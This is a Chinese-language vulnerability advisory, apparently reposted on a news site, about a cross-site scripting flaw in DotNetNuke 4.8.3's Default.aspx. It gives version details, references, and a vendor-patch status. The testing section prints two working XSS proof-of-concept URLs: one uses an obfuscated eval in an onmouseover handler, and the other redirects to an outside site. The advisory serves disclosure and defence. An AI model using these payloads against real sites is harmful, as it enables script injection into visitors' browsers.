• DotNetNuke Default.aspx跨站脚本漏洞

  • 网网网络  阅读[0]次  评论[0]条  发布时间:2009-10-17  发布人:网网网络

文章摘要:受影响系统: DotNetNukeDotNetNuke4.8.3描述: BUG

受影响系统:
dotnetnuke dotnetnuke 4.8.3
描述:


bugtraq  id: 29437

dotnetnuke(dnn)是免费的开源内容管理系统。

dotnetnuke的default.aspx页面没有正确地过滤用户通过url提交的输入,远程攻击者可以提交恶意url请求执行跨站脚本攻击。

〈*来源:www.amnpardaz.com
  
  链接:http://secunia.com/advisories/30481/
        http://marc.info/?l=bugtraq&m=121216049617814&w=2
*〉

测试方法:



警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[dnn url]/default.aspx/"onmouseover="x=‘al‘;x=x+‘ert(/soroush dalili from www.bugreport.ir/)‘;eval(x);alert().aspx
http://[dnn url]/default.aspx/bugreport/"onmouseover="var a=‘.aspx?‘;document.location=‘http://www.bugreport.ir/?archive‘;

建议:


厂商补丁:

dotnetnuke
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dotnetnuke.com/
顶一下
(1000)
50%
踩一下
(1000)
50%
【已有0位网友发表了看法,点击查看。】 复制本页共享msn或qq等好友
  • 发表人:      可输入字数[200]字
  • 验证码:验证码,看不清楚?请点击刷新验证码  请输入计算结果
  • 法律声明:网友评论仅供网友表达个人看法,并不表明网网网络同意其观点或证实其描述
48小时评论排行
    友情链接